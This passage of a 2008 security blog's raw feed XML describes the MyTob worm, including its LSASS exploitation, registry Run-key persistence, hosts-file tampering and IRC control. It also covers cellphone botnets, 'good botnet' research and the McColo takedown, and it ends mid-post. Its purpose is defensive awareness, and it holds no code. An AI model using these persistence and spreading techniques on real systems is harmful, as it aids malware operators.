Which spreads via email, planting a &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=backdoor+Trojan+horse&amp;amp;sa=Search"&gt;backdoor Trojan horse&lt;/a&gt; which can be used by hackers to gain access and control over a victim's computer.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;Reference:&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.zdnetasia.com/news/security/0,39044215,62048377,00.htm?scid=rss_z_nw"&gt;http://news.cnet.com/8301-1009_3-10101392-83.html&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt; &lt;a href="http://www.zdnetasia.com/news/security/0,39044215,62048377,00.htm?scid=rss_z_nw"&gt;http://www.zdnetasia.com/news/security/0,39044215,62048377,00.htm?scid=rss_z_nw&lt;/a&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.computershopper.co.uk/news/237570/virus-shuts-down-three-london-hospitals-systems.html"&gt;http://www.computershopper.co.uk/news/237570/virus-shuts-down-three-london-hospitals-systems.html&lt;/a&gt;&lt;/p&gt;     &lt;p class="MsoNormal" style="text-align: justify;"&gt;Now, you might all know what is MyTob virus/Trojan, I did some initial research on this and I found is that it spreads via mass mail, as it is a mass mailing worm, it does this via &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=SMTP&amp;amp;sa=Search"&gt;SMTP&lt;/a&gt; and sending mails to addresses which it collects from outlook or from the other available address books present in windows. And also by harvesting email addresses from the local hard disk by scanning files with extensions WAB, PL, ADB, TBB, DBX, ASP, PHP, SHTL and HTM. It also has the capability to open a backdoor and then spread via the network by exploiting the vulnerabilities mostly by exploiting the &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=LSASS&amp;amp;sa=Search"&gt;LSASS&lt;/a&gt; (&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=MS04-011&amp;amp;sa=Search"&gt;MS04-011&lt;/a&gt;).&lt;/p&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;This virus/Trojan at times disable various AV and firewall products and also will often modify the &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=local+HOSTS+file&amp;amp;sa=Search"&gt;local Hosts File&lt;/a&gt;, so that internet addresses of known security providers are redirected and thus become unavailable. These worms also connects to an &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Internet+Relay+Chat&amp;amp;sa=Search"&gt;Internet Relay Chat&lt;/a&gt; (IRC) server and join the master's chat channels there. Via these chatrooms the master of the worm can issue commands to the worm, and to a large extent remote control the infected computer.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;It affects the following systems:&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;On initial run it copies itself to the windows system folder mostly by the name "&lt;b style=""&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=MSNMSGR.EXE&amp;amp;sa=Search"&gt;MSNMSGR.EXE&lt;/a&gt;", "&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Wfdmgr.Exe&amp;amp;sa=Search"&gt;Wfdmgr.Exe&lt;/a&gt;&lt;/b&gt;". and then creates the registry entries in following locations.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;tt&gt;&lt;span style="font-size: 10pt;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/tt&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;br&gt;  &lt;tt&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\&lt;/tt&gt;&lt;tt&gt;RunOnce&lt;/tt&gt;&lt;br&gt; &lt;tt&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\&lt;/tt&gt;&lt;tt&gt;RunServices&lt;/tt&gt;&lt;br&gt; &lt;tt&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/tt&gt;&lt;/span&gt;&lt;br&gt; &lt;tt&gt;&lt;span style="font-size: 10pt;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\&lt;/span&gt;&lt;/tt&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;tt&gt;RunServices&lt;/tt&gt;&lt;br&gt; &lt;tt&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\&lt;/tt&gt;&lt;tt&gt;RunOnce&lt;/tt&gt;&lt;br&gt; &lt;tt&gt;HKEY_CURRENT_USER\Software\Microsoft\OLE&lt;/tt&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&amp;nbsp;It may send mails with attachments and the Subject line like, Error Status, Server Report, Mail Transaction Failed, Mail Delivery System, hello, hi etc.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;The following are the aliases I found for different AV products.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Net-Worm.Win32.Mytob.c+%28Kaspersky%20Lab%29&amp;amp;sa=Search"&gt;Net-Worm.Win32.Mytob.c (Kaspersky&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=W32/Mydoom.gen@MM+%28McAfee%29&amp;amp;sa=Search"&gt;W32/Mydoom.gen@MM (McAfee)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=W32.Mytob.C@mm+%28Symantec%29&amp;amp;sa=Search"&gt;W32.Mytob.C@mm (Symantec)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Win32.HLLM.MyDoom.20+%28Doctor%20Web%29&amp;amp;sa=Search"&gt;Win32.HLLM.MyDoom.20 (Doctor Web)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=W32/Mytob-C+%28Sophos%29&amp;amp;sa=Search"&gt;W32/Mytob-C (Sophos)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=WORM_MYDOOM.GEN+%28Trend%20Micro%29&amp;amp;sa=Search"&gt;WORM_MYDOOM.GEN (Trend&lt;/a&gt; Micro), &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Worm/Zusha.A+%28H+BEDV%29&amp;amp;sa=Search"&gt;Worm/Zusha.A (H+BEDV)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Worm.Mytob.A+%28ClamAV%29&amp;amp;sa=Search"&gt;Worm.Mytob.A (ClamAV)&lt;/a&gt;, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=W32/Mytob.C.worm+%28Panda%29&amp;amp;sa=Search"&gt;W32/Mytob.C.worm (Panda)&lt;/a&gt;&lt;br&gt; &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;It has other variants like Other versions: .a, .be, .bi, .bk, .bt, .cf, .ch, .dc, .eg, .r, .t, .u, .v, .w, .x, .y&lt;/p&gt;For removal instructions I would prefer all of you to visit the vendor sites as mentioned below.    &lt;p class="MsoNormal" style="text-align: justify;"&gt;References:&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.sophos.com/support/disinfection/worms.html"&gt;http://www.sophos.com/support/disinfection/worms.html&lt;/a&gt;&lt;/p&gt;  &lt;span style="font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2005-022614-4627-99&amp;amp;tabid=3"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2005-022614-4627-99&amp;amp;tabid=3&lt;/a&gt;&lt;/span&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6296040602589768932?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6296040602589768932/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6296040602589768932' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6296040602589768932'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6296040602589768932'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/three-london-hospitals-is-hit-by.html' title='Three London hospitals is Hit by Computer virus'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5544841742142253907</id><published>2008-11-18T06:24:00.001-08:00</published><updated>2009-01-22T11:46:04.998-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Botnet DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='botnets for cell phones'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Cellphone Botnets'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>Cell Phone Botnets....The newest threat in 2009</title><content type='html'>  &lt;p class="MsoNormal" style="text-align: justify;"&gt;I was going through internet for some recent variants of &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Botnet&amp;amp;sa=Search"&gt;Botnets&lt;/a&gt;, Think what did i found, its a completely a new variant predicted by security researchers across the industry, government and universities. They have described about five kind of new threats which may be seen in the forth coming years. The one which caught my eyes are the &amp;quot;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Threats+to+VoIP+and+mobile+devices&amp;amp;sa=Search"&gt;Threats to VoIP and mobile devices&lt;/a&gt;&amp;quot;. And the researchers also say that the threats in year 2009 will be all about Data as the primary motive. As the mobile phone devices are getting more and more smarter and popular as a portable device for accessing internet and other various uses it is also getting more and more vulnerable for attack. The VOIP is still vulnerable like other computing infrastructures, the &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Cyber+criminals&amp;amp;sa=Search"&gt;Cyber criminals&lt;/a&gt; may leverage this issue to attack, which may include &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=voice%20+fraud&amp;amp;sa=Search"&gt;voice fraud&lt;/a&gt;, data theft, and other various scams. The VOIP may also experience DOS attacks. Just think about a malware who infects a large number of VOIP phones and then it floods a network with traffic, and this result could be highly disruptive. The researchers are talking about developing a &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=IPS+system+for+VOIP&amp;amp;sa=Search"&gt;IPS system for VOIP&lt;/a&gt; at the carrier level. And also to develop a trust based network where only the legitimate calls get through. &lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;As we all can see the new 3G mobile devices has changed dramatically that what a mobile devices can really do. As per the researchers &amp;quot;Financial motivation and increased adoption will increase attacks to smart phones in the years to come&amp;quot;. As it is predicted that more and more financial transactions will happen over cell phones in the near future, so the attacks may increase in near future too. Already in Japan, people use their cell phones at vending machines and subway token dispensers. They also predict that the malwares will be injected onto phones and then it will turn the phone as a Bot. And then when the cell botnet is large enough it can generate DoS against the core network of cellular services.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;The Best part is that the cell phone technology is still in evolving phase, so the the security can be designed at this stage, that is what the researchers say.&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;References:&lt;/p&gt;&lt;a href="http://news.cnet.com/8301-1009_3-10067994-83.html"&gt;http://news.cnet.com/8301-1009_3-10067994-83.html&lt;/a&gt;&lt;br&gt; &lt;a href="http://www.gtiscsecuritysummit.com/pdf/CyberThreatsReport2009.pdf"&gt;http://www.gtiscsecuritysummit.com/pdf/CyberThreatsReport2009.pdf&lt;/a&gt;&lt;br&gt;&lt;a href="http://www.dslreports.com/forum/r21277841-Cellphone-Botnets-Blackmailing-VOIP-Healthy-Cybercrime"&gt;http://www.dslreports.com/forum/r21277841-Cellphone-Botnets-Blackmailing-VOIP-Healthy-Cybercrime&lt;/a&gt;&lt;br&gt; &lt;a href="http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=211600782"&gt;http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=211600782&lt;/a&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5544841742142253907?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5544841742142253907/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5544841742142253907' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5544841742142253907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5544841742142253907'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/cell-phone-botnetsthe-newest-threat-in.html' title='Cell Phone Botnets....The newest threat in 2009'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-510771655032670310</id><published>2008-11-17T11:33:00.001-08:00</published><updated>2009-01-22T11:46:05.000-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Botnet DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='botnets for cell phones'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>Botnets Vs Botnets</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Botnets&amp;amp;sa=Search"&gt;Botnets&lt;/a&gt; - are armies of infected computers used to attack websites - requires borrowing tactics from the bad guys, say computer security researchers. A researching team at the University of Washington, US, has plans to use army of good botnets computers to neutralise the bad ones. Botnets are networks of these &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Zombies&amp;amp;sa=Search"&gt;zombies&lt;/a&gt; and are used to send spam or launch distributed &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=DDoS&amp;amp;sa=Search"&gt;DDoS&lt;/a&gt; attacks. These attacks can cause internet servers to crash by overwhelming them with information requests from a botnet's computers. They are so commonly used to extort money from website owners. I Just came accross an article which says that researchers are suggesting of creating "Good Worms" which will go from computer to computer and get rid of all malicious things like worms, &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Trojan+horse&amp;amp;sa=Search"&gt;trojan horses&lt;/a&gt; and viruses. But the catch is, its a double edge sword this so called good worm can go terribelly wrong.&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=University+of+Washington&amp;amp;sa=Search"&gt;University of Washington&lt;/a&gt; wants to bring together their own botnet; a good botnet and they believe that their plan would not only be cheap to implement, but would be able to cope with attacks from botnets of any size. This good botnet is known as &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Phalanx&amp;amp;sa=Search"&gt;Phalanx&lt;/a&gt;, the Washington team believes their system could render all forms of DDoS attacks obsolete. Instead of the server Phalanx is protecting access information directly, all incoming information would have to pass through the swarm of "mailbox" computers.&lt;br /&gt;&lt;br /&gt;There is one more interesting fact that Security researchers have uncovered, there are evidences of war between rival criminal enterprises connected to two of the most sophisticated malware toolkits in current use. The cyber criminals are battling to own tens of thousands of compromised computers. The best available example of these kind of Botnet is &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Trojan.Srizbi&amp;amp;sa=Search"&gt;Trojan.Srizbi&lt;/a&gt;, as detected by &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Symantec&amp;amp;sa=Search"&gt;Symantec&lt;/a&gt;, Srizbi is spread by the famous &lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=MPack+attack+kit&amp;amp;sa=Search"&gt;MPack attack kit&lt;/a&gt;, This trojan when installed in computer it uninstalls competing spam malware being spread by another nasty piece of malware dubbed the Storm Worm.&lt;br /&gt;&lt;br /&gt;At the end I would expect you all to go through the bellow links as the above post is not descriptive enough, and I leave you all a question, How safe are the "&lt;a href="http://www.google.com/cse?cx=partner-pub-2128194651431356%3A8gjv8v-86ja&amp;amp;ie=ISO-8859-1&amp;amp;q=Good+botnets&amp;amp;sa=Search"&gt;Good Botnets&lt;/a&gt;"? Kindly comment.&lt;br /&gt;&lt;br /&gt;References:&lt;br /&gt;&lt;a href="http://www.techdirt.com/articles/20010824/1312203.shtml#comments"&gt;http://www.techdirt.com/articles/20010824/1312203.shtml#comments&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.newscientist.com/article/dn13753"&gt;http://www.newscientist.com/article/dn13753&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.canadafreepress.com/index.php/article/2751"&gt;http://www.canadafreepress.com/index.php/article/2751&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.theregister.co.uk/2007/07/01/malware_gang_war/"&gt;http://www.theregister.co.uk/2007/07/01/malware_gang_war/&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-510771655032670310?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/510771655032670310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=510771655032670310' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/510771655032670310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/510771655032670310'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/botnets-vs-botnets.html' title='Botnets Vs Botnets'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8537046161644599927</id><published>2008-11-17T04:09:00.001-08:00</published><updated>2009-01-22T11:43:29.141-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>McColo is Shut Downdown, massive drop in spam</title><content type='html'>On Tuesday, ISPs stopped routing traffic for McColo, a hosting provider .The action followed investigations by security researchers found that McColo hosting for many botnets&amp;#39; command and control servers, according to an article in the Washington Post. The volume of junk e-mail sent worldwide dropped drastically after that. Lots of security companies found a significant drop in Spam traffic after the cutoff. &lt;br&gt; &lt;br&gt;For more details Visit :&lt;br&gt;&lt;br&gt;&lt;a href="http://www.washingtonpost.com/wp-dyn/content/article/2008/11/12/AR2008111200658.html?nav=hcmoduletmv&amp;amp;sub=AR&amp;amp;sid=ST2008111200662&amp;amp;s_pos="&gt;http://www.washingtonpost.com/wp-dyn/content/article/2008/11/12/AR2008111200658.html?nav=hcmoduletmv&amp;amp;sub=AR&amp;amp;sid=ST2008111200662&amp;amp;s_pos=&lt;/a&gt;&lt;br&gt; &lt;br&gt;&lt;a href="http://www.securityfocus.com/brief/855?ref=rss"&gt;http://www.securityfocus.com/brief/855?ref=rss&lt;/a&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8537046161644599927?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8537046161644599927/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8537046161644599927' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8537046161644599927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8537046161644599927'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/mccolo-is-shut-downdown-massive-drop-in.html' title='McColo is Shut Downdown, massive drop in spam'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6692025175075901630</id><published>2008-11-14T20:37:00.001-08:00</published><updated>2008-11-14T20:37:32.329-08:00</updated><title type='text'>Humble request</title><content type='html'>Hi all, I have a humble request, I expect you to put your views on my&lt;br&gt;posts, all of the valuable views and comments will help me in&lt;br&gt;improving my writing and research skills.&lt;p&gt;Thanks in advance.&lt;br&gt;Regards&lt;br&gt;--  W &amp;amp; E&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6692025175075901630?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6692025175075901630/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6692025175075901630' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6692025175075901630'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6692025175075901630'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/humble-request.html' title='Humble request'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5575132607382464005</id><published>2008-11-14T04:24:00.001-08:00</published><updated>2008-11-14T04:24:20.028-08:00</updated><title type='text'>Soon to Come.......</title><content type='html'>Soon to come more on RFID Security, keep visiting.&lt;br&gt;Thanks&lt;br&gt;--W &amp;amp; E&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5575132607382464005?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5575132607382464005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5575132607382464005' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5575132607382464005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5575132607382464005'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/11/soon-to-come.html' title='Soon to Come.......'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-875529254633242445</id><published>2008-11-14T03:36:00.001-08:00</published><updated>2009-01-22T11:46:05.001-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Botnet DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>How the Bots Are spread</title><content type='html'>&lt;div class="gmail_quote"&gt;&lt;div&gt;&lt;div class="Wj3C7c"&gt;&lt;div class="gmail_quote"&gt;&lt;div&gt;&lt;div&gt;&lt;p&gt;&lt;font size="1"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="font-size: 12pt; line-height: 115%;"&gt;How the Bots Are spread&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-size: 12pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font size="1"&gt;The bots are spread basically by exploiting known or 0-day vulnerabilities, and after a successful exploitation the bot uses TFTP, FTP, HTTP or IRC for communicating and uploading files and controls, once installed in the target machine it tries to connect to the bot master IP address, so that it can poll itself to the server for its presence. The Bots mostly communicates over IRC channel using specially crafted nick names like ABC|789465 or [m3b0t]-123456, and joins the bot master&amp;#39;s channel for accepting various commands by the following ways.&lt;/font&gt;&lt;/p&gt;  &lt;p style="margin-left: 0.5in; text-indent: -0.25in;"&gt;&lt;font size="1"&gt;&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;;"&gt;&lt;span&gt;•&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: 